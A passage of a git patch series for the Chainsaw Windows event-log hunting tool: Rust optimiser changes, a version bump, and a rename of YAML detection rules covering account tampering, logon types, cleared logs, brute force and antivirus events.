@@ -339,7 +339,11 @@ fn run() -> Result<()> { ); d.identifiers.clear(); d.expression = - tau_engine::core::optimiser::shake(d.expression, true); + tau_engine::core::optimiser::shake(d.expression); + d.expression = + tau_engine::core::optimiser::rewrite(d.expression); + d.expression = + tau_engine::core::optimiser::matrix(d.expression); serde_yaml::to_string(&d)? } Filter::Expression(_) => { diff --git a/src/rule/chainsaw.rs b/src/rule/chainsaw.rs index a56f107e..29cd9244 100644 --- a/src/rule/chainsaw.rs +++ b/src/rule/chainsaw.rs @@ -203,10 +203,17 @@ pub fn load(rule: &Path) -> crate::Result { detection.expression = optimiser::coalesce(detection.expression, &detection.identifiers); detection.identifiers.clear(); - detection.expression = optimiser::shake(detection.expression, true); + detection.expression = optimiser::shake(detection.expression); + detection.expression = optimiser::rewrite(detection.expression); + detection.expression = optimiser::matrix(detection.expression); Filter::Detection(detection) } - Filter::Expression(expression) => Filter::Expression(optimiser::shake(expression, true)), + Filter::Expression(expression) => Filter::Expression({ + let expression = optimiser::shake(expression); + let expression = optimiser::rewrite(expression); + let expression = optimiser::matrix(expression); + expression + }), }; Ok(rule) } diff --git a/src/rule/mod.rs b/src/rule/mod.rs index 90370378..8ada75c9 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs @@ -112,7 +112,9 @@ pub fn load_rule(path: &Path) -> crate::Result> { fields: vec![], - filter: chainsaw::Filter::Detection(rule.tau.optimise(true, true).detection), + filter: chainsaw::Filter::Detection( + rule.tau.optimise(Default::default()).detection, + ), aggregate: rule.aggregate.map(|a| chainsaw::Aggregate { count: a.count, @@ -146,7 +148,9 @@ pub fn load_rule(path: &Path) -> crate::Result> { fields: vec![], - filter: chainsaw::Filter::Detection(rule.tau.optimise(true, true).detection), + filter: chainsaw::Filter::Detection( + rule.tau.optimise(Default::default()).detection, + ), aggregate: None, }, From 577073f9168afbe5bf42d18430fe0b5ab11f00fb Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 21 Jun 2022 23:02:16 +0100 Subject: [PATCH 38/77] build: bump to v2.0.0-alpha.5 --- Cargo.lock | 2 +- Cargo.toml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 3f6f8c1b..3959d1de 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -156,7 +156,7 @@ checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" [[package]] name = "chainsaw" -version = "2.0.0-alpha.4" +version = "2.0.0-alpha.5" dependencies = [ "aho-corasick 0.7.18", "anyhow", diff --git a/Cargo.toml b/Cargo.toml index fd5be64f..c5b32653 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -1,6 +1,6 @@ [package] name = "chainsaw" -version = "2.0.0-alpha.4" +version = "2.0.0-alpha.5" repository = "https://github.com/countercept/chainsaw" description = "Rapidly Search and Hunt Through Windows Event Logs" authors = ["James Dorgan ","Alex Kornitzer "] From 55426673233b2e0c2d2eef68e4b1f7203425a14e Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Fri, 24 Jun 2022 00:00:20 +0100 Subject: [PATCH 39/77] renaming chainsaw rules --- rules/account_tampering/new_user_created.yml | 29 ------------- .../user_added_to_global_group.yml | 36 ---------------- .../user_added_to_local_group.yml | 36 ---------------- .../user_added_to_universal_group.yml | 36 ---------------- rules/antivirus/f-secure.yml | 43 ------------------- rules/antivirus/kaspersky.yml | 31 ------------- rules/antivirus/sophos.yml | 31 ------------- rules/antivirus/windows_defender.yml | 31 ------------- rules/lateral_movement/batch_logon.yml | 41 ------------------ rules/lateral_movement/interactive_logon.yml | 41 ------------------ rules/lateral_movement/network_logon.yml | 41 ------------------ rules/lateral_movement/rdp_logon.yml | 41 ------------------ rules/lateral_movement/service_logon.yml | 41 ------------------ rules/lateral_movement/unlock_logon.yml | 40 ----------------- .../security_audit_log_was_cleared.yml | 32 -------------- .../log_tampering/system_log_was_cleared.yml | 32 -------------- rules/login_attacks/account_brute_force.yml | 34 --------------- rules/service_tampering/event_log.yml | 31 ------------- 18 files changed, 647 deletions(-) delete mode 100644 rules/account_tampering/new_user_created.yml delete mode 100644 rules/account_tampering/user_added_to_global_group.yml delete mode 100644 rules/account_tampering/user_added_to_local_group.yml delete mode 100644 rules/account_tampering/user_added_to_universal_group.yml delete mode 100644 rules/antivirus/f-secure.yml delete mode 100644 rules/antivirus/kaspersky.yml delete mode 100644 rules/antivirus/sophos.yml delete mode 100644 rules/antivirus/windows_defender.yml delete mode 100644 rules/lateral_movement/batch_logon.yml delete mode 100644 rules/lateral_movement/interactive_logon.yml delete mode 100644 rules/lateral_movement/network_logon.yml delete mode 100644 rules/lateral_movement/rdp_logon.yml delete mode 100644 rules/lateral_movement/service_logon.yml delete mode 100644 rules/lateral_movement/unlock_logon.yml delete mode 100644 rules/log_tampering/security_audit_log_was_cleared.yml delete mode 100644 rules/log_tampering/system_log_was_cleared.yml delete mode 100644 rules/login_attacks/account_brute_force.yml delete mode 100644 rules/service_tampering/event_log.yml diff --git a/rules/account_tampering/new_user_created.yml b/rules/account_tampering/new_user_created.yml deleted file mode 100644 index 3cd5844d..00000000 --- a/rules/account_tampering/new_user_created.yml +++ /dev/null @@ -1,29 +0,0 @@ ---- -title: New User Created -group: Account Tampering -description: A new user was created. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.EventData.TargetUserName - - name: User SID - to: Event.EventData.TargetSid - - -filter: - Event.System.EventID: 4720 diff --git a/rules/account_tampering/user_added_to_global_group.yml b/rules/account_tampering/user_added_to_global_group.yml deleted file mode 100644 index ef556794..00000000 --- a/rules/account_tampering/user_added_to_global_group.yml +++ /dev/null @@ -1,36 +0,0 @@ ---- -title: User Added to Global Group -group: Account Tampering -description: A user was added to an global group. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.EventData.TargetUserName - - name: Member SID - to: Event.EventData.MemberSid - - -filter: - condition: global and not admin_or_rdp - - global: - Event.System.EventID: 4728 - admin_or_rdp: - Event.EventData.TargetUserName: - - Admin - - Remote Desktop diff --git a/rules/account_tampering/user_added_to_local_group.yml b/rules/account_tampering/user_added_to_local_group.yml deleted file mode 100644 index 8af797ea..00000000 --- a/rules/account_tampering/user_added_to_local_group.yml +++ /dev/null @@ -1,36 +0,0 @@ ---- -title: User Added to Local Group -group: Account Tampering -description: A user was added to a local group. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.EventData.TargetUserName - - name: Member SID - to: Event.EventData.MemberSid - - -filter: - condition: global and not admin_or_rdp - - global: - Event.System.EventID: 4732 - admin_or_rdp: - Event.EventData.TargetUserName: - - Admin - - Remote Desktop diff --git a/rules/account_tampering/user_added_to_universal_group.yml b/rules/account_tampering/user_added_to_universal_group.yml deleted file mode 100644 index bed52b27..00000000 --- a/rules/account_tampering/user_added_to_universal_group.yml +++ /dev/null @@ -1,36 +0,0 @@ ---- -title: User Added to Universal Group -group: Account Tampering -description: A user was added to a universal group. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.EventData.TargetUserName - - name: Member SID - to: Event.EventData.MemberSid - - -filter: - condition: global and not admin_or_rdp - - global: - Event.System.EventID: 4756 - admin_or_rdp: - Event.EventData.TargetUserName: - - Admin - - Remote Desktop diff --git a/rules/antivirus/f-secure.yml b/rules/antivirus/f-secure.yml deleted file mode 100644 index 20fde701..00000000 --- a/rules/antivirus/f-secure.yml +++ /dev/null @@ -1,43 +0,0 @@ ---- -title: F-Secure Antivirus -group: Antivirus -description: Events from F-Secure's Antivirus products. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: Threat Name - from: threat_name - container: - field: Event.EventData.rv - format: json - to: iname - - name: Threat Path - from: threat_path - container: - field: Event.EventData.rv - format: json - to: obj.ref - - name: SHA1 - from: sha1 - container: - field: Event.EventData.rv - format: json - to: obj.sha1 - - -filter: - Event.System.Provider: F-Secure Ultralight SDK diff --git a/rules/antivirus/kaspersky.yml b/rules/antivirus/kaspersky.yml deleted file mode 100644 index e466e989..00000000 --- a/rules/antivirus/kaspersky.yml +++ /dev/null @@ -1,31 +0,0 @@ ---- -title: Kaspersky Antivirus -group: Antivirus -description: Events from Kaspersky's Antivirus products. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: Threat Name - to: Event.EventData.Data[1] - - name: Threat Path - to: Event.EventData.Data[0] - - -filter: - Event.System.Provider: - - Real-time file protection - - OnDemandScan diff --git a/rules/antivirus/sophos.yml b/rules/antivirus/sophos.yml deleted file mode 100644 index db54ef2a..00000000 --- a/rules/antivirus/sophos.yml +++ /dev/null @@ -1,31 +0,0 @@ ---- -title: Sophos Antivirus -group: Antivirus -description: Events from Sophos' Antivirus products. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: Threat Type - to: Event.EventData.Data[0] - - name: Threat Name - to: Event.EventData.Data[2] - - name: Threat Path - to: Event.EventData.Data[1] - - -filter: - Event.System.Provider: Sophos Anti-Virus diff --git a/rules/antivirus/windows_defender.yml b/rules/antivirus/windows_defender.yml deleted file mode 100644 index b5931982..00000000 --- a/rules/antivirus/windows_defender.yml +++ /dev/null @@ -1,31 +0,0 @@ ---- -title: Windows Defender -group: Antivirus -description: Events from Windows Defender. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.EventData.Detection User - - name: Threat Name - to: Event.EventData.Threat Name - - name: Threat Path - to: Event.EventData.Path - - -filter: - Event.System.Provider: Microsoft-Windows-Windows Defender diff --git a/rules/lateral_movement/batch_logon.yml b/rules/lateral_movement/batch_logon.yml deleted file mode 100644 index a22e15c3..00000000 --- a/rules/lateral_movement/batch_logon.yml +++ /dev/null @@ -1,41 +0,0 @@ ---- -title: Batch Logon -group: Lateral Movement -description: An Batch based logon. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.EventData.TargetUserName - - name: Logon Type - to: Event.EventData.LogonType - - name: IP Address - to: Event.EventData.IpAddress - - -filter: - condition: batch and not local_ips_or_machine_accounts - - batch: - Event.System.EventID: 4624 - Event.EventData.LogonType: 4 - local_ips_or_machine_accounts: - - Event.EventData.IpAddress: - - '-' - - 127.0.0.1 - - ::1 - - Event.EventData.TargetUserName: $* diff --git a/rules/lateral_movement/interactive_logon.yml b/rules/lateral_movement/interactive_logon.yml deleted file mode 100644 index 4f356a58..00000000 --- a/rules/lateral_movement/interactive_logon.yml +++ /dev/null @@ -1,41 +0,0 @@ ---- -title: Interactive Logon -group: Lateral Movement -description: An Interactive based logon. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.EventData.TargetUserName - - name: Logon Type - to: Event.EventData.LogonType - - name: IP Address - to: Event.EventData.IpAddress - - -filter: - condition: interactive and not local_ips_or_machine_accounts - - interactive: - Event.System.EventID: 4624 - Event.EventData.LogonType: 2 - local_ips_or_machine_accounts: - - Event.EventData.IpAddress: - - '-' - - 127.0.0.1 - - ::1 - - Event.EventData.TargetUserName: $* diff --git a/rules/lateral_movement/network_logon.yml b/rules/lateral_movement/network_logon.yml deleted file mode 100644 index 2a0c84ff..00000000 --- a/rules/lateral_movement/network_logon.yml +++ /dev/null @@ -1,41 +0,0 @@ ---- -title: Network Logon -group: Lateral Movement -description: An Network based logon -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.EventData.TargetUserName - - name: Logon Type - to: Event.EventData.LogonType - - name: IP Address - to: Event.EventData.IpAddress - - -filter: - condition: network and not local_ips_or_machine_accounts - - network: - Event.System.EventID: 4624 - Event.EventData.LogonType: 3 - local_ips_or_machine_accounts: - - Event.EventData.IpAddress: - - '-' - - 127.0.0.1 - - ::1 - - Event.EventData.TargetUserName: $* diff --git a/rules/lateral_movement/rdp_logon.yml b/rules/lateral_movement/rdp_logon.yml deleted file mode 100644 index 6b30d410..00000000 --- a/rules/lateral_movement/rdp_logon.yml +++ /dev/null @@ -1,41 +0,0 @@ ---- -title: RDP Logon -group: Lateral Movement -description: An RDP based logon. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.EventData.TargetUserName - - name: Logon Type - to: Event.EventData.LogonType - - name: IP Address - to: Event.EventData.IpAddress - - -filter: - condition: rdp and not local_ips_or_machine_accounts - - rdp: - Event.System.EventID: 4624 - Event.EventData.LogonType: 10 - local_ips_or_machine_accounts: - - Event.EventData.IpAddress: - - '-' - - 127.0.0.1 - - ::1 - - Event.EventData.TargetUserName: $* diff --git a/rules/lateral_movement/service_logon.yml b/rules/lateral_movement/service_logon.yml deleted file mode 100644 index 3a445b98..00000000 --- a/rules/lateral_movement/service_logon.yml +++ /dev/null @@ -1,41 +0,0 @@ ---- -title: Service Logon -group: Lateral Movement -description: An Service based logon -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.EventData.TargetUserName - - name: Logon Type - to: Event.EventData.LogonType - - name: IP Address - to: Event.EventData.IpAddress - - -filter: - condition: service and not local_ips_or_machine_accounts - - service: - Event.System.EventID: 4624 - Event.EventData.LogonType: 5 - local_ips_or_machine_accounts: - - Event.EventData.IpAddress: - - '-' - - 127.0.0.1 - - ::1 - - Event.EventData.TargetUserName: $* diff --git a/rules/lateral_movement/unlock_logon.yml b/rules/lateral_movement/unlock_logon.yml deleted file mode 100644 index 74ab79a8..00000000 --- a/rules/lateral_movement/unlock_logon.yml +++ /dev/null @@ -1,40 +0,0 @@ ---- -title: Unlock Logon -group: Lateral Movement -description: An Unlock based logon. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.EventData.TargetUserName - - name: Logon Type - to: Event.EventData.LogonType - - name: IP Address - to: Event.EventData.IpAddress - - -filter: - condition: unlock and not local_ips_or_machine_accounts - - unlock: - Event.System.EventID: 4624 - Event.EventData.LogonType: 7 - local_ips_or_machine_accounts: - - Event.EventData.IpAddress: - - '-' - - 127.0.0.1 - - ::1 - - Event.EventData.TargetUserName: $* diff --git a/rules/log_tampering/security_audit_log_was_cleared.yml b/rules/log_tampering/security_audit_log_was_cleared.yml deleted file mode 100644 index bd010f2f..00000000 --- a/rules/log_tampering/security_audit_log_was_cleared.yml +++ /dev/null @@ -1,32 +0,0 @@ ---- -title: Security Audit Logs Cleared -group: Log Tampering -description: The security audit logs were cleared. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.UserData.LogFileCleared.SubjectUserName - - -filter: - condition: security_log_cleared and not empty - - security_log_cleared: - Event.System.EventID: 1102 - empty: - Event.UserData.LogFileCleared.SubjectUserName: diff --git a/rules/log_tampering/system_log_was_cleared.yml b/rules/log_tampering/system_log_was_cleared.yml deleted file mode 100644 index a3a6ad6c..00000000 --- a/rules/log_tampering/system_log_was_cleared.yml +++ /dev/null @@ -1,32 +0,0 @@ ---- -title: System Logs Cleared -group: Log Tampering -description: The system logs were cleared. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.UserData.LogFileCleared.SubjectUserName - - -filter: - condition: system_log_cleared and not empty - - system_log_cleared: - Event.System.EventID: 104 - empty: - Event.UserData.LogFileCleared.SubjectUserName: diff --git a/rules/login_attacks/account_brute_force.yml b/rules/login_attacks/account_brute_force.yml deleted file mode 100644 index 9935fe9e..00000000 --- a/rules/login_attacks/account_brute_force.yml +++ /dev/null @@ -1,34 +0,0 @@ ---- -title: Account Brute Force -group: Login Attacks -description: An account that appears to have been brute forced. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: User - to: Event.EventData.TargetUserName - - -filter: - condition: failed_logons and not empty - - failed_logons: - Event.System.EventID: 4625 - empty: - Event.EventData.TargetUserName: 'null' - - -aggregate: - count: '>5' - fields: - - Event.EventData.TargetUserName diff --git a/rules/service_tampering/event_log.yml b/rules/service_tampering/event_log.yml deleted file mode 100644 index 54c9414c..00000000 --- a/rules/service_tampering/event_log.yml +++ /dev/null @@ -1,31 +0,0 @@ ---- -title: Windows Event Log Stopped -group: Service Tampering -description: The Windows Event Log service has been stopped. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: Service Name - to: Event.EventData.param1 - - name: Action - to: Event.EventData.param2 - - -filter: - Event.System.EventID: 7040 - Event.EventData.param1: Windows Event Log - Event.EventData.param2: disabled From cba03e77c730af8a55f7a7eb07a2e929a5160d79 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Fri, 24 Jun 2022 00:00:27 +0100 Subject: [PATCH 40/77] renaming chainsaw rules --- .../new_user_created.yml.chainsaw | 29 +++++++++++++ .../user_added_to_global_group.yml.chainsaw | 36 ++++++++++++++++ .../user_added_to_local_group.yml.chainsaw | 36 ++++++++++++++++ ...user_added_to_universal_group.yml.chainsaw | 36 ++++++++++++++++ .../antivirus/f-secure.yml.chainsaw | 43 +++++++++++++++++++ .../antivirus/kaspersky.yml.chainsaw | 31 +++++++++++++ chainsaw_rules/antivirus/sophos.yml.chainsaw | 31 +++++++++++++ .../antivirus/windows_defender.yml.chainsaw | 31 +++++++++++++ .../lateral_movement/batch_logon.yml.chainsaw | 41 ++++++++++++++++++ .../interactive_logon.yml.chainsaw | 41 ++++++++++++++++++ .../network_logon.yml.chainsaw | 41 ++++++++++++++++++ .../lateral_movement/rdp_logon.yml.chainsaw | 41 ++++++++++++++++++ .../service_logon.yml.chainsaw | 41 ++++++++++++++++++ .../unlock_logon.yml.chainsaw | 40 +++++++++++++++++ ...ecurity_audit_log_was_cleared.yml.chainsaw | 32 ++++++++++++++ .../system_log_was_cleared.yml.chainsaw | 32 ++++++++++++++ .../account_brute_force.yml.chainsaw | 34 +++++++++++++++ .../service_tampering/event_log.yml.chainsaw | 31 +++++++++++++ 18 files changed, 647 insertions(+) create mode 100644 chainsaw_rules/account_tampering/new_user_created.yml.chainsaw create mode 100644 chainsaw_rules/account_tampering/user_added_to_global_group.yml.chainsaw create mode 100644 chainsaw_rules/account_tampering/user_added_to_local_group.yml.chainsaw create mode 100644 chainsaw_rules/account_tampering/user_added_to_universal_group.yml.chainsaw create mode 100644 chainsaw_rules/antivirus/f-secure.yml.chainsaw create mode 100644 chainsaw_rules/antivirus/kaspersky.yml.chainsaw create mode 100644 chainsaw_rules/antivirus/sophos.yml.chainsaw create mode 100644 chainsaw_rules/antivirus/windows_defender.yml.chainsaw create mode 100644 chainsaw_rules/lateral_movement/batch_logon.yml.chainsaw create mode 100644 chainsaw_rules/lateral_movement/interactive_logon.yml.chainsaw create mode 100644 chainsaw_rules/lateral_movement/network_logon.yml.chainsaw create mode 100644 chainsaw_rules/lateral_movement/rdp_logon.yml.chainsaw create mode 100644 chainsaw_rules/lateral_movement/service_logon.yml.chainsaw create mode 100644 chainsaw_rules/lateral_movement/unlock_logon.yml.chainsaw create mode 100644 chainsaw_rules/log_tampering/security_audit_log_was_cleared.yml.chainsaw create mode 100644 chainsaw_rules/log_tampering/system_log_was_cleared.yml.chainsaw create mode 100644 chainsaw_rules/login_attacks/account_brute_force.yml.chainsaw create mode 100644 chainsaw_rules/service_tampering/event_log.yml.chainsaw diff --git a/chainsaw_rules/account_tampering/new_user_created.yml.chainsaw b/chainsaw_rules/account_tampering/new_user_created.yml.chainsaw new file mode 100644 index 00000000..3cd5844d --- /dev/null +++ b/chainsaw_rules/account_tampering/new_user_created.yml.chainsaw @@ -0,0 +1,29 @@ +--- +title: New User Created +group: Account Tampering +description: A new user was created. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: User SID + to: Event.EventData.TargetSid + + +filter: + Event.System.EventID: 4720 diff --git a/chainsaw_rules/account_tampering/user_added_to_global_group.yml.chainsaw b/chainsaw_rules/account_tampering/user_added_to_global_group.yml.chainsaw new file mode 100644 index 00000000..ef556794 --- /dev/null +++ b/chainsaw_rules/account_tampering/user_added_to_global_group.yml.chainsaw @@ -0,0 +1,36 @@ +--- +title: User Added to Global Group +group: Account Tampering +description: A user was added to an global group. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Member SID + to: Event.EventData.MemberSid + + +filter: + condition: global and not admin_or_rdp + + global: + Event.System.EventID: 4728 + admin_or_rdp: + Event.EventData.TargetUserName: + - Admin + - Remote Desktop diff --git a/chainsaw_rules/account_tampering/user_added_to_local_group.yml.chainsaw b/chainsaw_rules/account_tampering/user_added_to_local_group.yml.chainsaw new file mode 100644 index 00000000..8af797ea --- /dev/null +++ b/chainsaw_rules/account_tampering/user_added_to_local_group.yml.chainsaw @@ -0,0 +1,36 @@ +--- +title: User Added to Local Group +group: Account Tampering +description: A user was added to a local group. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Member SID + to: Event.EventData.MemberSid + + +filter: + condition: global and not admin_or_rdp + + global: + Event.System.EventID: 4732 + admin_or_rdp: + Event.EventData.TargetUserName: + - Admin + - Remote Desktop diff --git a/chainsaw_rules/account_tampering/user_added_to_universal_group.yml.chainsaw b/chainsaw_rules/account_tampering/user_added_to_universal_group.yml.chainsaw new file mode 100644 index 00000000..bed52b27 --- /dev/null +++ b/chainsaw_rules/account_tampering/user_added_to_universal_group.yml.chainsaw @@ -0,0 +1,36 @@ +--- +title: User Added to Universal Group +group: Account Tampering +description: A user was added to a universal group. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Member SID + to: Event.EventData.MemberSid + + +filter: + condition: global and not admin_or_rdp + + global: + Event.System.EventID: 4756 + admin_or_rdp: + Event.EventData.TargetUserName: + - Admin + - Remote Desktop diff --git a/chainsaw_rules/antivirus/f-secure.yml.chainsaw b/chainsaw_rules/antivirus/f-secure.yml.chainsaw new file mode 100644 index 00000000..20fde701 --- /dev/null +++ b/chainsaw_rules/antivirus/f-secure.yml.chainsaw @@ -0,0 +1,43 @@ +--- +title: F-Secure Antivirus +group: Antivirus +description: Events from F-Secure's Antivirus products. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: Threat Name + from: threat_name + container: + field: Event.EventData.rv + format: json + to: iname + - name: Threat Path + from: threat_path + container: + field: Event.EventData.rv + format: json + to: obj.ref + - name: SHA1 + from: sha1 + container: + field: Event.EventData.rv + format: json + to: obj.sha1 + + +filter: + Event.System.Provider: F-Secure Ultralight SDK diff --git a/chainsaw_rules/antivirus/kaspersky.yml.chainsaw b/chainsaw_rules/antivirus/kaspersky.yml.chainsaw new file mode 100644 index 00000000..e466e989 --- /dev/null +++ b/chainsaw_rules/antivirus/kaspersky.yml.chainsaw @@ -0,0 +1,31 @@ +--- +title: Kaspersky Antivirus +group: Antivirus +description: Events from Kaspersky's Antivirus products. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: Threat Name + to: Event.EventData.Data[1] + - name: Threat Path + to: Event.EventData.Data[0] + + +filter: + Event.System.Provider: + - Real-time file protection + - OnDemandScan diff --git a/chainsaw_rules/antivirus/sophos.yml.chainsaw b/chainsaw_rules/antivirus/sophos.yml.chainsaw new file mode 100644 index 00000000..db54ef2a --- /dev/null +++ b/chainsaw_rules/antivirus/sophos.yml.chainsaw @@ -0,0 +1,31 @@ +--- +title: Sophos Antivirus +group: Antivirus +description: Events from Sophos' Antivirus products. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: Threat Type + to: Event.EventData.Data[0] + - name: Threat Name + to: Event.EventData.Data[2] + - name: Threat Path + to: Event.EventData.Data[1] + + +filter: + Event.System.Provider: Sophos Anti-Virus diff --git a/chainsaw_rules/antivirus/windows_defender.yml.chainsaw b/chainsaw_rules/antivirus/windows_defender.yml.chainsaw new file mode 100644 index 00000000..b5931982 --- /dev/null +++ b/chainsaw_rules/antivirus/windows_defender.yml.chainsaw @@ -0,0 +1,31 @@ +--- +title: Windows Defender +group: Antivirus +description: Events from Windows Defender. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.Detection User + - name: Threat Name + to: Event.EventData.Threat Name + - name: Threat Path + to: Event.EventData.Path + + +filter: + Event.System.Provider: Microsoft-Windows-Windows Defender diff --git a/chainsaw_rules/lateral_movement/batch_logon.yml.chainsaw b/chainsaw_rules/lateral_movement/batch_logon.yml.chainsaw new file mode 100644 index 00000000..a22e15c3 --- /dev/null +++ b/chainsaw_rules/lateral_movement/batch_logon.yml.chainsaw @@ -0,0 +1,41 @@ +--- +title: Batch Logon +group: Lateral Movement +description: An Batch based logon. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Logon Type + to: Event.EventData.LogonType + - name: IP Address + to: Event.EventData.IpAddress + + +filter: + condition: batch and not local_ips_or_machine_accounts + + batch: + Event.System.EventID: 4624 + Event.EventData.LogonType: 4 + local_ips_or_machine_accounts: + - Event.EventData.IpAddress: + - '-' + - 127.0.0.1 + - ::1 + - Event.EventData.TargetUserName: $* diff --git a/chainsaw_rules/lateral_movement/interactive_logon.yml.chainsaw b/chainsaw_rules/lateral_movement/interactive_logon.yml.chainsaw new file mode 100644 index 00000000..4f356a58 --- /dev/null +++ b/chainsaw_rules/lateral_movement/interactive_logon.yml.chainsaw @@ -0,0 +1,41 @@ +--- +title: Interactive Logon +group: Lateral Movement +description: An Interactive based logon. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + 